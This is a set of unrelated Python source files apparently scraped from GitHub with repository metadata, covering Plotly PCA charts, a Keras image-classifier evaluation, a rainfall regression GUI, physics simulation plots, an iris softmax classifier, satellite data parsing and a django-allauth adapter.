xaxis = dict(title = 'Rang Mondial',ticklen = 5,zeroline= False))
fig2 = dict(data = data, layout = layout)
# figure3
fig3 = px.scatter(df2016, x="num_students", y="citations",color="country")
fig3.update_layout(clickmode='event+select')
fig3.update_traces(marker_size=20)
# figure3
fig4 = px.scatter(df2016, x="world_rank", y="citations",color="country")
fig4.update_layout(clickmode='event+select')
fig4.update_traces(marker_size=20)
############### Figures pour page 2 ######################
# PCA
#1- FIRST-FIG
df_2016 = df2016.drop(['year', 'university_name','country'], axis=1)
#features = ["sepal_width", "sepal_length", "petal_width", "petal_length"]
features = ['world_rank','teaching','research','citations',]
fig5 = px.scatter_matrix(
df_2016,
dimensions=features,
#color="species"
)
fig5.update_traces(diagonal_visible=False)
# 2- ACP-FIG
pca = PCA(n_components=4)
components = pca.fit_transform(df_2016)
labels = {
str(i): f"PC {i+1} ({var:.1f}%)"
for i, var in enumerate(pca.explained_variance_ratio_ * 100)
}
fig6 = px.scatter_matrix(
components,
labels=labels,
dimensions=range(4),
)
fig6.update_traces(diagonal_visible=False)
# 3- cumsum pca.explained variance
pca2 = PCA()
pca2.fit(df_2016)
val_prop = ((n-1)/n*pca2.explained_variance_)/100
exp_var_cumul = np.cumsum(pca2.explained_variance_ratio_)
fig7 = px.area(
x=range(1, exp_var_cumul.shape[0] + 1),
y=exp_var_cumul,
labels={"x": "# Components", "y": "cumul_variance"}
)
fig8 = px.area(
x=range(1, val_prop.shape[0] + 1),
y=val_prop,
labels={"x": "# Components", "y": "variance"}
)
|
AbdiNi/Plotly-Dash
|
Dash_Plotly/My_dataset.py
|
My_dataset.py
|
py
| 4,007 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "pandas.read_csv",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "plotly.express.scatter",
"line_number": 46,
"usage_type": "call"
},
{
"api_name": "plotly.express",
"line_number": 46,
"usage_type": "name"
},
{
"api_name": "plotly.graph_objs.Scatter",
"line_number": 51,
"usage_type": "call"
},
{
"api_name": "plotly.graph_objs",
"line_number": 51,
"usage_type": "name"
},
{
"api_name": "plotly.graph_objs.Scatter",
"line_number": 53,
"usage_type": "call"
},
{
"api_name": "plotly.graph_objs",
"line_number": 53,
"usage_type": "name"
},
{
"api_name": "plotly.express.scatter",
"line_number": 63,
"usage_type": "call"
},
{
"api_name": "plotly.express",
"line_number": 63,
"usage_type": "name"
},
{
"api_name": "plotly.express.scatter",
"line_number": 70,
"usage_type": "call"
},
{
"api_name": "plotly.express",
"line_number": 70,
"usage_type": "name"
},
{
"api_name": "plotly.express.scatter_matrix",
"line_number": 83,
"usage_type": "call"
},
{
"api_name": "plotly.express",
"line_number": 83,
"usage_type": "name"
},
{
"api_name": "sklearn.decomposition.PCA",
"line_number": 92,
"usage_type": "call"
},
{
"api_name": "plotly.express.scatter_matrix",
"line_number": 99,
"usage_type": "call"
},
{
"api_name": "plotly.express",
"line_number": 99,
"usage_type": "name"
},
{
"api_name": "sklearn.decomposition.PCA",
"line_number": 111,
"usage_type": "call"
},
{
"api_name": "numpy.cumsum",
"line_number": 114,
"usage_type": "call"
},
{
"api_name": "plotly.express.area",
"line_number": 116,
"usage_type": "call"
},
{
"api_name": "plotly.express",
"line_number": 116,
"usage_type": "name"
},
{
"api_name": "plotly.express.area",
"line_number": 122,
"usage_type": "call"
},
{
"api_name": "plotly.express",
"line_number": 122,
"usage_type": "name"
}
] |
2053821942
|
from config import dogs_and_cats_config as config
from pyimagesearch.preprocessing import ImageToArrayPreprocessor, MeanPreprocessor, CropPreprocessor
from pyimagesearch.io import HDF5DatasetGenerator
from keras.models import load_model
import progressbar
import json
import numpy as np
import cv2
import argparse
import pandas as pd
# construct argument parser and parse the argument
ap = argparse.ArgumentParser()
ap.add_argument('-s', '--submit', required=True, help='path to submission file')
args = vars(ap.parse_args())
# load RGB means for json
means = json.loads(open(config.DATASET_MEAN).read())
# initialize image preprocessors
mp, cp, iap = MeanPreprocessor(means['R'], means['G'], means['B']), CropPreprocessor(227, 227), ImageToArrayPreprocessor()
# load model
print('[INFO] loading model...')
model = load_model(config.MODEL_PATH)
# initialize dataset generator
test_gen = HDF5DatasetGenerator(config.PUBLIC_TEST_HDF5, batch_size=64, preprocessors=[mp])
preds = []
# initialize progressbar
widgets = ['Evaluating: ', progressbar.Percentage(), ' ', progressbar.Bar(), ' ', progressbar.ETA()]
pbar = progressbar.ProgressBar(maxval=test_gen.num_images//64, widgets=widgets)
# loop over single pass of test data
for i, (images, labels) in enumerate(test_gen.generator(passes=1)):
# loop over individual images
for image in images:
# apply crop preprocessor
crops = cp.preprocess(image)
crops = np.array([iap.preprocess(crop) for crop in crops], dtype='float32')
# predict on the crops
pred = model.predict(crops)
preds.append(pred.mean(axis=0))
pbar.update(i)
pbar.finish()
# read sample submission
df = pd.DataFrame({
'id': np.array(range(1, test_gen.num_images+1)),
'label': np.array(preds).argmax(axis=1)
})
df.to_csv(args['submit'])
# close database
test_gen.close()
|
lykhahaha/Mine
|
PractitionerBundle/chapter10-dogs_vs_cats/crop_accuracy_public_test.py
|
crop_accuracy_public_test.py
|
py
| 1,859 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "argparse.ArgumentParser",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "json.loads",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "config.dogs_and_cats_config.DATASET_MEAN",
"line_number": 18,
"usage_type": "attribute"
},
{
"api_name": "config.dogs_and_cats_config",
"line_number": 18,
"usage_type": "name"
},
{
"api_name": "pyimagesearch.preprocessing.MeanPreprocessor",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "pyimagesearch.preprocessing.CropPreprocessor",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "pyimagesearch.preprocessing.ImageToArrayPreprocessor",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "keras.models.load_model",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "config.dogs_and_cats_config.MODEL_PATH",
"line_number": 25,
"usage_type": "attribute"
},
{
"api_name": "config.dogs_and_cats_config",
"line_number": 25,
"usage_type": "name"
},
{
"api_name": "pyimagesearch.io.HDF5DatasetGenerator",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "config.dogs_and_cats_config.PUBLIC_TEST_HDF5",
"line_number": 28,
"usage_type": "attribute"
},
{
"api_name": "config.dogs_and_cats_config",
"line_number": 28,
"usage_type": "name"
},
{
"api_name": "progressbar.Percentage",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "progressbar.Bar",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "progressbar.ETA",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "progressbar.ProgressBar",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "pandas.DataFrame",
"line_number": 51,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 53,
"usage_type": "call"
}
] |
962892446
|
from tkinter import *
from tkinter.messagebox import showinfo
import pandas as pd
import numpy as np
import sklearn as sk
from sklearn.linear_model import LinearRegression
import matplotlib.pyplot as plt
# function call
def cal():
data = pd.read_csv("2a.csv")
if (var1.get()=='123'):
showinfo("Invalid input", "please select a state")
df = pd.DataFrame(data,
columns=['SUBDIVISION', 'YEAR', 'JAN', 'FEB', 'MAR', 'APR', 'MAY', 'JUN', 'JUL', 'AUG', 'SEP',
'OCT', 'NOV', 'DEC'])
data= df.loc[df['SUBDIVISION'] == var1.get()]
x = data['YEAR']
x = x.values.reshape(-1, 1)
# x=x.drop(['Unnamed: 0'],axis=1)
if (var.get()=='123'):
showinfo("Invalid input", "please select a month")
y = data[var.get()]
y = y.values.reshape(-1, 1)
clf = LinearRegression()
clf.fit(x, y)
v = int(Year.get())
if (v<=0 and v>10000 ):
showinfo("Invalid input", "please use a valid year")
inp = np.array(v)
inp = inp.reshape(1, -1)
# Print output
showinfo("output",f"The precipitation in inches for the input is:,{clf.predict(inp)}")
# year_index = 100
# year = [i for i in range(v-50,v+50)]
plt.scatter(x, y, color='g',marker= ".")
plt.scatter(v, clf.predict(inp), color='b',label=f"Predicted value {clf.predict(inp)} in {Year.get()}",marker= "*")
v=max(v,2015)
x1=[1901,v]
y1=[clf.predict([[1901]])[0][0],clf.predict([[v]])[0][0]]
plt.plot(x1,y1,color='r',label=f"linear prediction from 1901 to {v} ")
plt.title('Precipitation level')
plt.xlabel('Year')
plt.ylabel(f"Precipitation for {var.get()}")
plt.legend()
# Plot a graph of precipitation levels vs n# of days
plt.show()
#GUI
root=Tk()
root.geometry("600x600")
# root.title("rainfall prediction")
Label(root, text="Enter year and choose any one of these",font="any 15 underline",fg="#f58d25").grid(row=0,column=3,ipady=10)
Label(root, text=" Year =",font="any 13 bold",foreground="#853535").grid(row=1,column=1)
Year=Entry(root,justify=LEFT,bg="#cafad2",font="any 12 bold",fg="red")
Year.grid(row=1,column=2,ipady=5,pady=17,ipadx=15)
var=StringVar()
var.set("123")
Radiobutton(root,text="Jan",variable=var, value="JAN",font="any 12",foreground="blue").grid(row=3,column=2)
Radiobutton(root,text="Feb",variable=var, value="FEB",font="any 12",foreground="blue").grid(row=4,column=2)
Radiobutton(root,text="Mar",variable=var, value="MAR",font="any 12",foreground="blue").grid(row=5,column=2)
Radiobutton(root,text="Apr",variable=var, value="APR",font="any 12",foreground="blue").grid(row=6,column=2)
Radiobutton(root,text="May",variable=var, value="MAY",font="any 12",foreground="blue").grid(row=7,column=2)
Radiobutton(root,text="Jun",variable=var, value="JUN",font="any 12",foreground="blue").grid(row=8,column=2)
obj=['ANDAMAN & NICOBAR ISLANDS', 'ARUNACHAL PRADESH', 'ASSAM & MEGHALAYA', 'NAGA MANI MIZO TRIPURA', 'GANGETIC WEST BENGAL', 'ORISSA', 'JHARKHAND', 'BIHAR', 'EAST UTTAR PRADESH', 'WEST UTTAR PRADESH', 'UTTARAKHAND', 'HARYANA DELHI & CHANDIGARH', 'PUNJAB', 'HIMACHAL PRADESH', 'JAMMU & KASHMIR', 'WEST RAJASTHAN' , 'EAST RAJASTHAN', 'WEST MADHYA PRADESH', 'EAST MADHYA PRADESH', 'GUJARAT REGION', 'SAURASHTRA & KUTCH', 'KONKAN & GOA', 'MADHYA MAHARASHTRA', 'MATATHWADA', 'VIDARBHA', 'CHHATTISGARH', 'COASTAL ANDHRA PRADESH', 'TELANGANA', 'RAYALSEEMA', 'TAMIL NADU', 'COASTAL KARNATAKA', 'NORTH INTERIOR KARNATAKA', 'SOUTH INTERIOR KARNATAKA', 'KERALA', 'LAKSHADWEEP',]
var1=StringVar()
var.set('ANDAMAN & NICOBAR ISLANDS')
OptionMenu(root,var1,*obj).grid(row=9,column=2)
Label(root, text=" Select -> :)",font="any 13 bold",foreground="#853535").grid(row=9,column=1)
Button(text="Calculate Now", command=cal, activebackground = "yellow",border=5).grid(row=11,column=2,pady=20,ipadx=25)
root.mainloop()
|
Santonu-Naskar/Rainfall-Prediction
|
rainfall/main/main1.py
|
main1.py
|
py
| 3,959 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "pandas.read_csv",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "tkinter.messagebox.showinfo",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "pandas.DataFrame",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "tkinter.messagebox.showinfo",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "sklearn.linear_model.LinearRegression",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "tkinter.messagebox.showinfo",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "tkinter.messagebox.showinfo",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.scatter",
"line_number": 45,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 45,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.scatter",
"line_number": 46,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 46,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.plot",
"line_number": 50,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 50,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.title",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 52,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.xlabel",
"line_number": 54,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 54,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.ylabel",
"line_number": 55,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 55,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.legend",
"line_number": 56,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 56,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.show",
"line_number": 59,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 59,
"usage_type": "name"
}
] |
30950837477
|
def D0(fp):
Dt = 1
taur = 1./(3*Dt)
return fp**2*taur/2.
def rms(fp,ts):
Dt = 1
taur = 1./(3*Dt)
d = 2
tts = ts*1e-5
return 4*Dt*tts+fp**2*taur**2/(d*(d-1))*(2*d*tts/taur+np.exp(-2*d*tts/taur)-1)
def swim(fp,rho):
Dt = 1
taur = 1./(3*Dt)
return rho*fp*fp*taur/2.0
if __name__=="__main__":
import numpy as np
import matplotlib.pyplot as plt
import sys
sys.path.append('../../plotting_scripts')
from jupyterplots import JupyterPlots
sys.path.append('../../analysis_scripts')
from logloader import LogLoader
figsize = JupyterPlots()
prefix1 = 'data2/'
tcut = -1
fps = np.array([1,5,10,20,40,60,80,100],int)
# density (in lj units)
rho = '0.7'
fig,axarr = plt.subplots(2,sharex=True,figsize=[figsize[0],figsize[0]*2])
fp = 100
fname = f'pressure_{fp}_{rho}'
ll = LogLoader(prefix1 + f'log_{fp}_{rho}.lammps.log')
ts = ll.data['Step']
RMSs = ll.data['c_mymsdd[4]']
Ps = ll.data['c_press']
Ds = ll.data['v_Diff']
#data = np.loadtxt(prefix1 + fname + '.txt.fixprint')
#ts = data[:,0]
#Ts = data[:,1]
#Ds = data[:,2]
#Ps = data[:,3]
#tcut = 200000
print(ts)
#axarr[0].plot(ts[1:],np.gradient(RMSs,ts)[1:]/4e-5,'o',label=rf'$f_p={fp}$')
axarr[0].plot(ts,RMSs,'o',label=rf'$f_p={fp}$')
axarr[0].plot(ts,rms(fp,ts),'k-')
#axarr[0].plot(ts,D0(fp)+0*ts,'k-')
#axarr[0].plot(ts[1:],Ds[1:],'.',label=rf'$f_p={fp}$')
axarr[1].plot(ts,Ps,'o',label=rf'$f_p={fp}$')
axarr[1].plot(ts,swim(fp,float(rho))+ts*0,'k-',label=rf'$f_p={fp}$')
axarr[0].set_ylabel(r'$<R^2>$')
axarr[1].set_ylabel(r'$P_{eff}$')
axarr[1].set_xlabel(r'$t$')
fig.savefig('results_single_pressure/' + fname + '.pdf')
plt.show()
|
samueljmcameron/ABPs_coarse_graining
|
experiments/2020_03_31/no_interactions_pressure/single_pressure.py
|
single_pressure.py
|
py
| 1,818 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "sys.path.append",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 31,
"usage_type": "attribute"
},
{
"api_name": "sys.path.append",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 33,
"usage_type": "attribute"
},
{
"api_name": "jupyterplots.JupyterPlots",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.subplots",
"line_number": 46,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 46,
"usage_type": "name"
},
{
"api_name": "logloader.LogLoader",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.show",
"line_number": 81,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 81,
"usage_type": "name"
}
] |
73279162747
|
import numpy as np
import matplotlib.pyplot as plt
# system variables
fs = 100e3
f = 1e3
phi = np.pi/4
N = 4*fs/f
n_var = 0.01
# create some empty vectors to fill
x = np.zeros(N, dtype=complex)
n_a = np.zeros(N, dtype=complex)
e = np.zeros(N)
w = np.zeros(N)
y = np.zeros(N, dtype=complex)
y_ = np.zeros(N, dtype=complex)
w_ = np.zeros(N)
# loop through performing esitmation
for n in xrange(int(N)):
# create reference signal
x[n] = np.exp(1j*(2*n*np.pi*f/fs + phi))
# create noise to get received signal
n_a[n] = float(np.random.normal(0, np.sqrt(n_var), 1)) + 1j*float(np.random.normal(0, np.sqrt(n_var), 1))
y[n] = x[n] + n_a[n]
# create the estimated signal
y_[n] = np.exp(1j*sum(w_))
# create the error signal
e[n] = y[n] * y_[n]
# create new frequency estimate
w_[n] = e[n]
# plot the results
plt.plot(np.real(x))
plt.plot(np.imag(y_))
plt.title("Maximum Likelihood Phase Estimation")
plt.xlabel("samples")
plt.ylabel("amplitude")
plt.show()
|
yrrapt/ada-comms
|
sinusoid_estimate_noise.py
|
sinusoid_estimate_noise.py
|
py
| 1,012 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "numpy.pi",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "numpy.zeros",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "numpy.exp",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "numpy.pi",
"line_number": 24,
"usage_type": "attribute"
},
{
"api_name": "numpy.random.normal",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "numpy.random",
"line_number": 27,
"usage_type": "attribute"
},
{
"api_name": "numpy.sqrt",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "numpy.exp",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.plot",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 40,
"usage_type": "name"
},
{
"api_name": "numpy.real",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.plot",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 41,
"usage_type": "name"
},
{
"api_name": "numpy.imag",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.title",
"line_number": 42,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 42,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.xlabel",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 43,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.ylabel",
"line_number": 44,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 44,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.show",
"line_number": 45,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 45,
"usage_type": "name"
}
] |
30192351629
|
import numpy as np
import matplotlib.pyplot as plt
from sklearn.metrics import accuracy_score
from sklearn.model_selection import train_test_split
from sklearn.datasets import load_iris
iris = load_iris()
X = iris.data
y = iris.target
def sigmoid(inX):# 定义sigmoid函数
return 1.0/(1+np.exp(-inX))
def std_data(X):
means = X.mean(axis=0) #均值
stds = X.std(axis=0) #标准差
A=X.shape[0] #样本个数
B= X.shape[1] + 1 #参数维度
X_std = np.ones((A, B))
X_std[:, 1:] = (X - means) / stds
return X_std
def predict(Pw): #准确率
y_pred=[]
for p in Pw:
P=list(p)
y_pred.append(P.index(max(P)))
return y_pred
def gradAscent(X_train,y_train,K_num):#梯度下降法解权值
loss=[]
ks = list(set(y_train))
N=X_train.shape[0] # N样本数,
M = X_train.shape[1] + 1 #M参数向量的维
data = std_data(X_train)
Weight = np.zeros((K_num - 1, M)) # 存储参数矩阵
temp=[1.0 / N * np.sum(data[y_train == ks[i]], axis=0) for i in range(K_num - 1)]
priEs = np.array(temp) # 期望值
for i in range(1000):
wx = np.exp(np.dot(Weight, data.transpose()))
probs = np.divide(wx, 1 + np.sum(wx, axis=0).transpose())
pEs = 1.0 / N * np.dot(probs, data)
loss.append(np.sum(pEs-priEs))
gradient = pEs - priEs + 1.0 /100 * Weight # 梯度
Weight = Weight - gradient # 修正参数
plt.figure()
x=[i for i in range(1000)]
plt.plot(x,loss)
plt.title('loss line')
plt.xlabel('number')
plt.ylabel('loss')
plt.show()
return Weight
def LogisticRegression(Weight,K,X_test):
N1= X_test.shape[0]
data=std_data(X_test)
prob = np.ones((N1,K))
prob[:,:-1] = np.exp(np.dot(data,Weight.transpose()))
prob =prob/ np.array([np.sum(prob,axis = 1)]).transpose() #概率
return prob
def main():
split_list = [0.1, 0.3, 0.5]# 载入数据
for i in split_list:
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=i)
K_num = np.shape(list(set(y_train)))[0]
W = gradAscent(X_train, y_train, K_num)
prob = LogisticRegression(W, K_num, X_test)
y_pre = predict(prob)
print("测试集:{} 准确率:{}".format(i, accuracy_score(y_pre, y_test)))
if __name__ == "__main__":
main()
|
TJPU-ML/Homework-for-the-fall-semester-of-2018
|
iris classification/王熙煚/lris.py
|
lris.py
|
py
| 2,416 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "sklearn.datasets.load_iris",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "numpy.exp",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "numpy.ones",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "numpy.sum",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "numpy.exp",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "numpy.dot",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "numpy.divide",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "numpy.sum",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "numpy.dot",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "numpy.sum",
"line_number": 42,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.figure",
"line_number": 46,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 46,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.plot",
"line_number": 48,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 48,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.title",
"line_number": 49,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 49,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.xlabel",
"line_number": 50,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 50,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.ylabel",
"line_number": 51,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 51,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.show",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 52,
"usage_type": "name"
},
{
"api_name": "numpy.ones",
"line_number": 59,
"usage_type": "call"
},
{
"api_name": "numpy.exp",
"line_number": 60,
"usage_type": "call"
},
{
"api_name": "numpy.dot",
"line_number": 60,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 61,
"usage_type": "call"
},
{
"api_name": "numpy.sum",
"line_number": 61,
"usage_type": "call"
},
{
"api_name": "sklearn.model_selection.train_test_split",
"line_number": 67,
"usage_type": "call"
},
{
"api_name": "numpy.shape",
"line_number": 68,
"usage_type": "call"
},
{
"api_name": "sklearn.metrics.accuracy_score",
"line_number": 72,
"usage_type": "call"
}
] |
12242514248
|
#!/usr/bin/env python
from rootpy import ROOT
from rootpy.io import File
from rootpy.tree import Tree
from collections import deque
def find_maintenance(filename):
aux_file = File(filename, 'read')
aux_tree = aux_file.get('t_hk_obox')
maintenance_start = False
maintenance_list = []
gps_time_list = []
ship_time_list = []
for entry in aux_tree:
if entry.obox_is_bad > 0: continue
if entry.obox_mode.encode('hex') == '04':
if not maintenance_start:
maintenance_start = True
gps_time_list.append(entry.abs_gps_week * 604800 + entry.abs_gps_second)
ship_time_list.append(entry.abs_ship_second)
else:
if maintenance_start:
maintenance_start = False
maintenance_list.append(((ship_time_list[0] + ship_time_list[-1]) / 2, (gps_time_list[0] + gps_time_list[-1]) / 2))
gps_time_list = []
ship_time_list = []
return [(int(x[0]), "%d:%d" % (int(x[1] / 604800), int(x[1] % 604800))) for x in maintenance_list]
def find_orbitstart(filename):
LAT_LEN = 500
lat_deque = deque()
orbitstart_list = []
ppd_file = File(filename, 'read')
ppd_tree = ppd_file.get('t_ppd')
ready_flag = True
pre_diff = 0.0
cur_diff = 0.0
for entry in ppd_tree:
if entry.flag_of_pos != 0x55: continue
lat_deque.append((entry.latitude, entry.ship_time_sec, entry.utc_time_sec))
if len(lat_deque) < LAT_LEN:
pre_diff = lat_deque[-1][0] - lat_deque[0][0]
continue
else:
lat_deque.popleft()
cur_diff = lat_deque[-1][0] - lat_deque[0][0]
if ready_flag and pre_diff < 0 and cur_diff >= 0:
orbitstart_list.append(((lat_deque[-1][1] + lat_deque[0][1]) / 2, (lat_deque[-1][2] + lat_deque[0][2]) / 2))
ready_flag = False
if not ready_flag and pre_diff > 0 and cur_diff <= 0:
ready_flag = True
pre_diff = cur_diff
return [(int(x[0]), "%d:%d" % (int(x[1] / 604800), int(x[1] % 604800))) for x in orbitstart_list]
|
ZhenghengLi/POLAR_DATA
|
Preprocessing/script/split_time.py
|
split_time.py
|
py
| 2,130 |
python
|
en
|
code
| 2 |
github-code
|
6
|
[
{
"api_name": "rootpy.io.File",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "collections.deque",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "rootpy.io.File",
"line_number": 34,
"usage_type": "call"
}
] |
18446576990
|
from django.conf import settings
from django.contrib import messages
from django.http import HttpResponseRedirect
from allauth.account import signals
from allauth.account.adapter import DefaultAccountAdapter
class AccountAdapter(DefaultAccountAdapter):
def is_open_for_signup(self, request):
return getattr(settings, "ACCOUNT_SIGNUP_OPEN", True)
def post_login(self, request, user, *, email_verification, signal_kwargs, email, signup, redirect_url):
# Copied form https://github.com/pennersr/django-allauth/blob/master/allauth/account/adapter.py#L441 in order
# to remove the "logged in" message. See this issue for more information: https://github.com/pennersr/django-allauth/issues/3205
from allauth.account.utils import get_login_redirect_url
response = HttpResponseRedirect(get_login_redirect_url(request, redirect_url, signup=signup))
if signal_kwargs is None:
signal_kwargs = {}
signals.user_logged_in.send(
sender=user.__class__,
request=request,
response=response,
user=user,
**signal_kwargs,
)
if getattr(settings, "ACCOUNT_SHOW_POST_LOGIN_MESSAGE", True) is True:
self.add_message(
request,
messages.SUCCESS,
"account/messages/logged_in.txt",
{"user": user},
)
return response
|
epicserve/django-base-site
|
apps/accounts/auth_adapter.py
|
auth_adapter.py
|
py
| 1,443 |
python
|
en
|
code
| 284 |
github-code
|
6
|
[
{
"api_name": "allauth.account.adapter.DefaultAccountAdapter",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "django.conf.settings",
"line_number": 11,
"usage_type": "argument"
},
{
"api_name": "django.http.HttpResponseRedirect",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "allauth.account.utils.get_login_redirect_url",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "allauth.account.signals.user_logged_in.send",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "allauth.account.signals.user_logged_in",
"line_number": 22,
"usage_type": "attribute"
},
{
"api_name": "allauth.account.signals",
"line_number": 22,
"usage_type": "name"
},
{
"api_name": "django.conf.settings",
"line_number": 30,
"usage_type": "argument"
},
{
"api_name": "django.contrib.messages.SUCCESS",
"line_number": 33,
"usage_type": "attribute"
},
{
"api_name": "django.contrib.messages",
"line_number": 33,
"usage_type": "name"
}
] |
6166850776
|
# -*- coding: utf-8 -*-
"""
Created on Tue Jun 6 16:06:45 2017
@author: Francesco
"""
import threading
import sys
import serial
import numpy as np
import time
import matplotlib.pyplot as plt
global PORT
global BAUD
global NUM_CHANNELS
global END_BUNDLE_BYTE
global BYTE_PER_CHANNEL
global BUNDLE_LENGTH
#BUNDLE SHAPE: |!|!|!|CH0_msb|CH0_lsb|ch1_msb|ch1_lsb|......|ch7_lsb|!|!|!|
PORT = "COM3"
BAUD = 115200
NUM_CHANNELS = 8
END_BUNDLE_BYTE = 3
BYTE_PER_CHANNEL = 2 #two bytes to represent int
BUNDLE_LENGTH = NUM_CHANNELS*BYTE_PER_CHANNEL
global ROWS
global COLS
ROWS = 4
COLS = 2
global ACQUISITION_TIME
ACQUISITION_TIME = 60
global SAMPLING_INTERVAL
